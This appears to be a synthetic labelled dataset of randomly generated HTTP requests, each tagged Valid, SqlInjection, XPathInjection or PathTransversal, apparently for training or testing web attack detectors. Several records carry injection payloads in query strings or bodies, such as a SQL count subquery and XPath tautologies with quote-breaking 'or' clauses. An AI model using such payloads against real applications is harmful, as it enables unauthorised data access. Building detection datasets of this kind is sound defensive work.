Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36108
Start - Id: 41822
class: SqlInjection
GET /bLlS_GTZJT@Gb.js?Yjag=bvypyLou1Awy&toroetm9ceeeai=i91&irf6Dvi9e4Srtar=2pln+&6ue=and++++0%3C%3E%28select+++count%28*%29+from++3krrti7t++++where+crwrzth%3C%3E%29&h6tsh9lwcclt=newlg&wHi6=848&_LXo=2649&qdaepc=2&WZYK=naQnvs+ret0services%24im&2eNQeG=6302&aylhiLn0n=oPbVV%40_FTm&Mnafuues8iarn=G HTTP/1.1
Host: www.ntaoln.cz
Connection: eTmo
Accept: */*
Accept-Charset: cp-950;q=0.8, x-mac-japanese, euc-cn;q=0.0, shift_jis, iso-2022-jp
Accept-Encoding: 
Accept-Language: ntoesVm-ptmbr;q=0.6
Cache-Control: no-cache
Client-ip: 200.70.15.74
Cookie: hiae=5;8etgsipEtseAeiu=dnleydsnt jecl3Rmochahomebc
Cookie2: $Version="571"
Date: Sun, 28 Nov 04 21:10:20 UTC
ETag: W/"Tc@F6JEKUDHdlFzOY"
Expect: jao4e=iser
From: ieruZue@TeqtS.fr
If-Modified-Since: Sat, 04 Mar 06 05:39:39 UTC
If-Unmodified-Since: Thu, 31 Jul 08 21:44:13 GMT
If-Match: *
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: Thu, 14 Jul 05 08:17:28 CET
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic aGUzczpsZXRh
Range: 1-,-175130,8812-321864
Referer: http://www.fltI.com/ai4I/hiUdLi/intoEee/nw76e/erAirn.png
TE: deflate;q=0.6,trailers,chunked
Trailer: Max-Forwards
User-Agent: iyrkNty
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 2.4 www.mhOtIl.jpg, 7.3 www.nrOdyt.jpg
Transfer-Encoding: gzip
Upgrade: ufar/3.7
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41822
Start - Id: 8912
class: Valid
GET /nalasetso/7iTossiatn2gocntihcr/iumnIoeuyhita/oorNSe9KCO9kza6MQ.sh?9soanenuh9re=697&EEB@dwp-=94654&viautoaeUieca=we0include4hodajulocation5g1sd&Odaeiamxti=21851597&9asoaAeretee=%3Cq3%7Esga6passwdu+%3E%5C9to&ehnettomt=un4ft&h4lsemnebtp=r&awglctudr1Na=o8&hez18teeedota=sed0&dser=9&fweeleXy3oracAt=TDn3t HTTP/1.0
Host: 160.0.136.188:1
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.0
Accept-Encoding: gzip, gzip;q=0.1, compress, gzip;q=0.6, compress;q=0.3
Accept-Language: n-auhi, n-3jHssy, 8-tco;q=0.2, ioqyty-nelaf1j
Cache-Control: min-fresh=2351
Client-ip: 178.118.114.226
Cookie: nhtnxybhtbu5sZ=wgn6gerhaoteantx;tjn=2;ehyAuPaenanto=2171;hdklija9tD=762;Y1xeyPYdropq-=oted;Eih=dh0rI
Cookie2: $Version="266"
Date: Sat, 11 Jun 05 19:24:58 CET
ETag: "o_YERB0dpVOt2YXC"
Expect: d9ctOe=heth;tUanr5o=xgazT
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sat, 13 Aug 05 08:10:37 CET
If-Unmodified-Since: Sun, 23 Nov 08 11:55:26 UTC
If-Match: *
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 580
MIME-Version: 7.9
Pragma: u5stz=rmr
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM eWNlbnV0cmllb2phbGVudWE5aTJlZWxvc3JtNmk2ZW8=
Range: 7-3572
Referer: http://omlsneTa.com/ecfyeo/uToaatTi/lBweP/nsIee.nsf
TE: chunked;q=0.4,trailers,trailers
Trailer: Pragma
User-Agent: wb@ytkF http://www.stoeei.ch
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: 1.7 35.171.235.220, 6.8 7.186.201.50:35418
Transfer-Encoding: Neeys; snhEp2i=7hsdiuo
Upgrade: D54Tc/5.2
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8912
Start - Id: 23809
class: Valid
GET /fRe/dPzeXRbTH/snmtye/kU9kO_kCpXBwqSwmC/eSryBCkLR/dcBtIeaw/NZZWetcFIOF/ortriedhgtiEwtu6he/DE0QsystemUpJsDdtelnet/64/eSZ@wGQnK6Ud7TqH.sh? HTTP/1.0
Host: www.enooohH.net:89735
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, identity, deflate, compress
Accept-Language: oe2o-d;q=0.0, fa-cDMwddb
Cache-Control: no-store
Client-ip: 254.182.73.170
Cookie: hze9h8hr2an=h;pheeohfaSt3n=683733;1atreoYc2=ngcctNieaEsae
Cookie2: $Version="72"
Date: Thu, 25 Sep 08 21:02:21 UTC
ETag: "nB_D5UyypLYa6kJ"
Expect: nses3
From: rntqivt@uiudd.fr
If-Modified-Since: Thu, 21 Aug 08 03:42:42 UTC
If-Unmodified-Since: Wed, 11 Apr 07 14:17:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 19:11:02 CET
Max-Forwards: 6664
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest nc=20BD76F5
Range: 323-
Referer: http://www.dfAle.uk/ohefd/tGdH6.dll
TE: gzip;q=0.8,deflate,trailers
Trailer: From
User-Agent: Mozilla/5.3 (X11; U; Unix 5.3; rm-6t; rv:2.1.0) Gecko/82427432
UA-CPU: PowerPC
UA-Disp: 363,234,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3057x063
Via: HTTP/1.8 71.178.44.82:2223, taa4o6/3.3 www.ryaa.shtml, FTP/3.3 9.181.96.171:76
Transfer-Encoding: compress
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 649 www.aAvheed.png "dS6Fnimdaari" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23809
Start - Id: 48588
class: XPathInjection
POST /QsD_R2C/eR9wI8hp6eaWJ1/7pyhhynChurOfnsoLseC/uysddNJ_uvk-QjOZ/pYt@UrXWqFP-hX/tsS1/rihJoreoteutnhlo63.png? HTTP/1.1
Content-Length: 467
Content-Language: reaahe
Content-Encoding: identity
Content-Location: http://NaJyss.org/iEnh.nsf
Content-MD5: NjVuc2hiZWhocmR1YXNFdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Nov 06 05:05:19 UTC
Last-Modified: Tue, 11 Oct 05 06:34:50 CET
Host: 115.28.63.109
Connection: keep-alive
Accept: text/*;q=0.4, image/*;q=0.3, image/gif
Accept-Charset: x-mac-chinesetrad;q=0.4, ks_c_5601-1987;q=0.9
Accept-Encoding: *
Accept-Language: aroen-oistah, TeoeyE-ncl8y;q=0.1, mkbhaz8-R5hlpEwo;q=0.0, ts8hp6s6-rSh;q=0.8
Cache-Control: max-age=6752
Client-ip: 58.151.109.14
Cookie: 5Vz-SR@=cthaaira9Ra;tu=3387;m0tAtqaazd=54731257;0nn31=re]eiair1
Cookie2: $Version="380"
Date: Mon, 28 May 07 04:21:11 GMT
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Wed, 26 Apr 06 08:51:00 CET
If-Unmodified-Since: Wed, 08 Dec 04 01:26:24 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Sun, 08 Jun 08 23:43:40 UTC
Max-Forwards: 0
MIME-Version: 0.0
Pragma: hieti=atx
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: 39-76,5-4266
Referer: http://www.nqsgr.de/h44d/meuxWTaa/9gsr/eee1n.tiff
TE: deflate;q=0.1,trailers
Trailer: Authorization
User-Agent: tenexjans/7.1.0
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 1.9 www.ierale.css
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iston=129&ensw2l=whgs3' or    (i   <   count(lc0aon/child::text())     and    j  <     count(stf/child::comment())   and   k <  count(iao/child::*)   )     or   'SAl' =' Nleas'    or&siemthwddn1sh4=193981&nOI.70=oe2o&etr92pthPc= iw 65qa h0;&sq4Noalrg=flosnn%teubody\&6SkCeboutrekh=nni&aregeg=dq6AUp5_&00lhe=tzanktInuv&tai7or=hel8MuZ7ai&snpUst50trnrjTs=m9h6h&aimOsrPnR=o&dMn=cnetcatm&tehaoasQh40e=br8ht

End - Id: 48588
Start - Id: 49152
class: XPathInjection
GET /a_InacJ7BXJ-nFr.8R0a/gnLtwtIcdukofa/XKwhA9.pl?ez4a=tv_jMlVsL&_jEPgroup by029=hfero%5Delej&EHerattParo=6951357&C1D@2hphp=3orcoa%27+++++or++++6+++%3C+count%28path%2Fchild%3A%3A*%29++++or+++++%27la0tsyas%27++++%3D+++%27&oeohle=+%285s%7Co+iz%5Brn+em HTTP/1.0
Host: www.l3terc.fr
Connection: raTc
Accept: */*;q=0.4
Accept-Charset: us-ascii, isiri-3342, iso-8859-9, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 23.206.75.20
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Sat, 14 Feb 09 20:31:54 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: h1pt5@iSlee.de
If-Modified-Since: Fri, 07 Jan 05 15:46:05 CET
If-Unmodified-Since: Sun, 15 Mar 09 10:25:31 CET
If-Match: *
If-None-Match: *
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 8230
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: woeb tyitxgi=npaonat
Range: 4916-
Referer: /iereiRqo/eniI6tas/a7etpqi/uwi04/m6ge.htm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.5 (compatible; MSIE 0.6; Linux i386; aOte)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/4.4 www.sbeeA.css, 2.8 120.51.100.22:4619
Transfer-Encoding: gzip
Upgrade: yfI/3.6
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49152
Start - Id: 24964
class: Valid
GET /sxJjCy8NaU80lfjjdX@B/i2A42CiC36L5ga/tnanludvtt3uanos/e8ts/i3.shtml?bj3euacneCle=tGtf2&ocelleiHT=ay0t9 HTTP/1.0
Host: 191.38.213.184
Connection: tlEmaAr
Accept: */*;q=0.3
Accept-Charset: hz-gb-2312, windows-1252
Accept-Encoding: gzip;q=0.6, compress;q=0.8, gzip
Accept-Language: s-wthoAec;q=0.8, yclT1-lanci, e-p9ial
Cache-Control: max-stale=5
Client-ip: 29.75.79.23
Cookie: BEZyq0aEAF=t39
Cookie2: $Version="472"
Date: Tue, 18 Aug 09 15:27:10 CET
ETag: W/"TwUFugKiaNsse5Cr"
Expect: 100-continue
From: iefmllR@anati.de
If-Modified-Since: Thu, 23 Feb 06 07:15:48 CET
If-Unmodified-Since: Sat, 09 Jun 07 12:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 125
MIME-Version: 3.7
Pragma: naa=50ivtsft
Proxy-Authorization: NTLM bmRzUmZ0b3RudnltbmJ5bXRqdTN0c3N1dTRON3lFaWVzb2k=
Authorization: Digest realm
Range: 528-04
Referer: /iT5c/rv6i/aaij.tar
TE: trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 2.3; sa-th; rv:3.8.0) Gecko/67948881
UA-CPU: PowerPC
UA-Disp: 028,484,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: 4.6 www.fIet6i.png
Transfer-Encoding: gzip
Upgrade: owsiw/5.6, ofet8/3.7
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24964
Start - Id: 11842
class: Valid
GET /qCRDECH-V1Flib@s6/kGj6L7WNselecta/JvCYhGZS2/aPtUzgaMJ8nDt/1dVzfLmh7UY--BOnw/f-O/i7rxsP/ode93gvkEcEe83rN.js?sO=Rn+&h4erng=SeT%7C9metajh+f&enoe=58676&NYlV=atewrar1bh&mhen=nlrtm8stdngZeletot&nu82aleln=7781&pSQTi=issaLekscmiai&wntpd=33042606&v8aO=0814&ijeeehst6e=p2ocmv&hdfe0uvewi=n+E&rjeevtsiap=9456306 HTTP/1.0
Host: www.rfily.it
Connection: igcgh
Accept: text/html;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: sHEsr-qimsttt;q=0.9, h-rnt2iroh;q=0.3, sasoeMt-lEnui8h;q=0.9, tcsMorea-oj6rn
Cache-Control: only-if-cached
Client-ip: 234.205.128.254
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="06"
Date: Thu, 09 Nov 06 23:11:19 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: hheiA3
From: keldk0a@nmntas.st
If-Modified-Since: Fri, 20 Jul 07 11:34:07 UTC
If-Unmodified-Since: Tue, 29 Aug 06 08:23:45 CET
If-Match: *
If-None-Match: *
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: 93-,9-,27-9587
Referer: http://www.yeeShC.gov/leaos.swf
TE: deflate;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 7.8; ws-Nn; rv:3.8.7) Gecko/00205720
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: compress
Upgrade: qeona/2.2, e3aae/0.6
Warning: 306 www.pYnI4i.jpg "ed1rpe" "Tue, 10 Mar 09 11:56:29 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11842
Start - Id: 19177
class: Valid
GET /CgiK2k/e7ismsql7Dgv69kC22ro/gBIZbdq4/SfuUxnQ1s4adznsVlnAs/varPt2RopenMulIvWGlike2/MbtysarsiAnnllaht/ap/hrT/l85TB1VXPCWbFwy/nviv.php3? HTTP/1.0
Host: www.erawenmt.it:8
Connection: close
Accept: audio/x-wav;q=0.1, text/*;q=0.1
Accept-Charset: iso-8859-4
Accept-Encoding: compress, gzip, deflate;q=0.7, deflate, deflate;q=0.8
Accept-Language: 8CreSeu-iuolpetc;q=0.4, l-hftg;q=0.3, ijte-rKOeoo
Cache-Control: no-cache
Client-ip: 68.134.240.21
Cookie: Esieyu0nensi=xvqsoestMg32Rai;too4drj0f=hq.;ro3ewaalhyaxde=91306;eoqab9nseeNtts=ofx;nYaatalnoHorrsn=8
Cookie2: $Version="5"
Date: Mon, 19 Oct 09 22:36:53 UTC
ETag: "yB-iVxAP-lgk3@L"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Sat, 19 Apr 08 03:02:21 CET
If-Unmodified-Since: Mon, 19 Oct 09 07:52:49 UTC
If-Match: "U.4MZjPVi1iW.LQ"
If-None-Match: "77i5Wj1XM-MJ8wEUxFi"
If-Range: Thu, 29 Oct 09 14:30:34 UTC
Max-Forwards: 7
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: ag5po itr4d2no=erCni
Authorization: Lfyfo snmw=ecaqeor
Range: 637-,71710-966266
Referer: http://www.oa9gse.biz/dolo71/Caator/Ytial/lcone.cgi
TE: trailers,deflate;q=0.7,gzip;q=0.9
Trailer: Referer
User-Agent: Qonomisasd/0.1.2.3.8
UA-CPU: 68000
UA-Disp: 848,6466,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: iryie/6.2 126.119.192.13, 1tolen/3.3 10.121.112.199
Transfer-Encoding: gzip
Upgrade: woeUzU/1.5, tnls/8.6, B9a/0.3
Warning: 766 111.23.99.19 "ltboo8yptdoEtUi9nb" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19177
Start - Id: 20010
class: Valid
GET /rNie5b.mspx?eoKbuh7o2=cLpsEojEf&7ua=lwe-h HTTP/1.0
Host: 78.121.96.55
Connection: keep-alive
Accept: audio/basic, video/mpeg;q=0.1, text/xml
Accept-Charset: windows-874, hz-gb-2312;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=2928
Client-ip: 24.128.85.39
Cookie: rdm3ehTnibsm5hr=k6hG7OXG6.B;dghaiond8oeoE=bhttpsi]i;7admeQswjt=t;2pd=tiframel>h+ 57;itEis7sg=19399;ew6tisr=gfFvAU.Xq
Cookie2: $Version="192"
Date: Tue, 10 Feb 09 07:36:25 CET
ETag: "3j4BgPdlUPkKGLV"
Expect: 100-continue
From: bbdufUe@sch6hwod.cz
If-Modified-Since: Thu, 20 Mar 08 05:46:32 CET
If-Unmodified-Since: Fri, 11 Jun 04 22:55:06 GMT
If-Match: "HCJ-c4QQ0ZH37J-7zBu"
If-None-Match: "BOmpGXTnICsa8EMV"
If-Range: Wed, 17 Nov 04 05:44:58 GMT
Max-Forwards: 053
MIME-Version: 9.6
Pragma: nf=raotehzr
Proxy-Authorization: dnaoe2 udeho=Assa
Authorization: Digest opaque="Al3isTt"
Range: -807,8014-4
Referer: /sesitil.rar
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (X11; U; Solaris 5.6; te-i5; rv:2.1.3) Gecko/50670386
UA-CPU: PowerPC
UA-Disp: 9579,194,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 428x755
Via: Iot1h/0.9 171.142.58.222
Transfer-Encoding: nbioie
Upgrade: ifoa/9.3, aeier/7.5, ddsoo/8.3
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20010
Start - Id: 26444
class: Valid
GET /eq.ZnKrUHrbs6GJmt-P/6rvtzaampt/egnrmOitd/.pR7/14ps8r@a7PD/@72BSUXperl/nstscaa62tuQ/fN.dll?clnpcnosHel2p=0lJRJm.l&isiro6emde=%3D&kha=6393 HTTP/1.0
Host: www.rXrwoe0.net:80
Connection: epssxt
Accept: */*
Accept-Charset: iso-8859-2, iso-8859-15;q=0.8, windows-1251, windows-1255;q=0.2, windows-1250;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 228.137.159.244
Cookie: bxN3eEdynrA=x;dkre9eNjr4eny= 7t;irese56=4;e3=lnode
Cookie2: $Version="77"
Date: Thu, 10 Nov 05 11:36:12 GMT
ETag: W/"k9Dk3NJbk72BU_HLo_V"
Expect: 100-continue
From: rhj7it@hRooetd.be
If-Modified-Since: Sun, 25 Dec 05 05:17:52 UTC
If-Unmodified-Since: Sun, 15 May 05 21:10:40 GMT
If-Match: *
If-None-Match: "3qU6NLzmBMrEjsTChc"
If-Range: Fri, 02 Sep 05 07:29:19 UTC
Max-Forwards: 80
MIME-Version: 7.7
Pragma: ce4Dztze='twdom'
Proxy-Authorization: Digest username="tmff8btS"
Authorization: otec ai8nnEro=enxorer4
Range: 31-37154,2-
Referer: http://www.p9iin.gov/sebofmtl/aeaSdw/0siqo4/va37/sOrnni.cfm
TE: trailers
Trailer: Connection
User-Agent: eo5xsAtwhh (6358HpaG)
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 598x8802
Via: HTTP/3.8 www.ehtmriD.jpeg:4
Transfer-Encoding: identity
Upgrade: 5tep/5.6, ncb/4.3, eo63/4.2
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 34.156.94.22
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26444
Start - Id: 25437
class: Valid
GET /uuhomeJTva6C81e/1tM11d56Y2YcvZQWBsx0/oA/f0qJ_/p112Gz8Yf8/pR/eDj/xtermsvyP-S2kFnode/nWGhk.jb04kkU/@xZkb/keths7Mi8adIn4t/nw40Wws9TR6Bcg2.cfm? HTTP/1.1
Host: www.5irs.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: renre-4vsuee5e;q=0.1, iosjhn-gtthhoSS;q=0.3, cCuttt-ae, Rii6n-2mdti;q=0.6, ns10liz-l7hitti;q=0.9
Cache-Control: no-store
Client-ip: 82.74.210.10
Cookie: rj1=tlesSoabsjes;xfTqto7fv=6vx;iet=d90bbRGK1;SKadmin.FJZKcusrL=?Riznetcat p7iLftp;a4=7tThtpasstde$sAn htaccesopen2
Cookie2: $Version="750"
Date: Mon, 01 Feb 10 10:55:11 GMT
ETag: W/"X-ZFUDTn73SFgF1VsMFY"
Expect: keo3Em
From: 2nOl@m8et6rtby.cz
If-Modified-Since: Thu, 10 Jul 08 22:08:24 CET
If-Unmodified-Since: Sun, 04 Oct 09 24:35:51 UTC
If-Match: "x6_80btAkPoLwhiVdW"
If-None-Match: "Xg195R@coEOCWMdItyIB"
If-Range: *
Max-Forwards: 76
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Oidtio d4hpsau=cst9
Authorization: Basic aHR5eG9sZTpnaXN0
Range: -7599
Referer: http://im17r.ch/oztwsIy/idrg/rnmae/arc78l/e8ra8e.asmx
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 3.4; 6h-bf; rv:3.3.7) Gecko/02145417
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 5.4 103.180.118.112
Transfer-Encoding: deflate
Upgrade: Eaqa/3.2, ndd/9.1, pel/7.0, tto1c/5.3
Warning: 345 58.178.216.208 "occtui" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25437
Start - Id: 44836
class: PathTransversal
GET /eEstnrteSes/Ty2noTeorqo9Z/61a6o.dll?tw4t2stdin=d%3Bsprm&s2sittnfe=r%5D%27o&hl=idc%3A+&o2rqesInrer=nmu&aceyeexnoeAgodi=nh&7renc0trt=f2+4eoxterm3OlNn&419httpsxxN7vbscript=iy7likejf6le&Hz_tE=h%285c%24tip+grhn%7E%5Binlmails&childhtacces5HKj4=800rzOhdlaTrs&lto63=0&erei=file%3A%2F%2F%2Ft%3A%2Fnpxs%2Fti%2FoYP.xml&0rjou=0fnnbzfkw&nadpyerynS=w&npeerbeq9fh7n=insertsu+%289ksnp0eese&dOIe1uqarr=645589 HTTP/1.0
Host: 33.247.0.16:80
Connection: keep-alive
Accept: text/*, text/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: r-fipt;q=0.1, to-pdrivpS, na-ehy;q=0.5
Cache-Control: min-fresh=56808
Client-ip: 203.89.41.237
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="41"
Date: Tue, 29 Jul 08 10:58:24 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 28 Nov 04 03:59:32 UTC
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "1PzXibVCPnYO-bO"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 294
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Basic aGVlcjdyOm9rd3Nz
Range: 4-,8-56742
Referer: http://tbqeho.gov/toeitn/nwEstesZ/2ssvs3q.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 8.1; pO-Ey; rv:4.3.1) Gecko/85538711
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: HTTP/8.1 www.oltonEs.html, HTTP/2.9 www.cccs.shtml, 8.6 217.230.68.190
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44836
Start - Id: 16759
class: Valid
GET /tUKn601xga/OeqLMjUKjw9/6Wdocument0qCr/iqvgw3oDb/fieaiDd0bota/te3leSleo9UheeRoo/evcorogeapmfeodrottm/noamt/el7pcshbui5Lsxneagst.tiff?yotdsny1bi=28&tHooldnn=e-P&3D0cht9=0879&thdsr4dn=66464&ui=etgn&ie9r0aaiQ=vbscriptjo&sdT8soe=36LH7ajJIF&QJRc=t+aisootrq&o4hF1sdy=hse8enn&9w1=5&oyaaewHssefa=1660138&iniHdigc=sqZZ&e4stamatlwiue9=ibggqHesl%3B%5Chtacces HTTP/1.1
Host: 76.241.8.153
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aapSoE7-hftf, AlM3rT-he;q=0.2
Cache-Control: no-transform
Client-ip: 112.245.83.68
Cookie: ntA=zt7aoh%3Bc;umsaiethsgpib=Reu;m1https%uG7HiDd=889272;we=fb;hdnMr=rlIT4KvpoUNM
Cookie2: $Version="44"
Date: Sat, 10 Apr 10 14:09:26 CET
ETag: W/"MTJidNSEGD-17Df_r"
Expect: 100-continue
From: 5bheroqe@o19bE.org
If-Modified-Since: Mon, 25 Aug 08 09:26:05 CET
If-Unmodified-Since: Mon, 12 Jan 09 04:28:46 UTC
If-Match: *
If-None-Match: "mhp5YOxTTVW6DZY"
If-Range: Thu, 18 Jun 09 09:48:39 UTC
Max-Forwards: 9
MIME-Version: 7.5
Pragma: l='iind'
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: Basic aGFlZTp0b2xkbg==
Range: 73855-,-7357
Referer: http://www.oxetc.net/ca642ls/zplnsnqb/Thqpito.bin
TE: chunked;q=0.7
Trailer: Accept-Encoding
User-Agent: shanbtg/2.4.5.6
UA-CPU: StrongARM
UA-Disp: 9773,708,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 097x7373
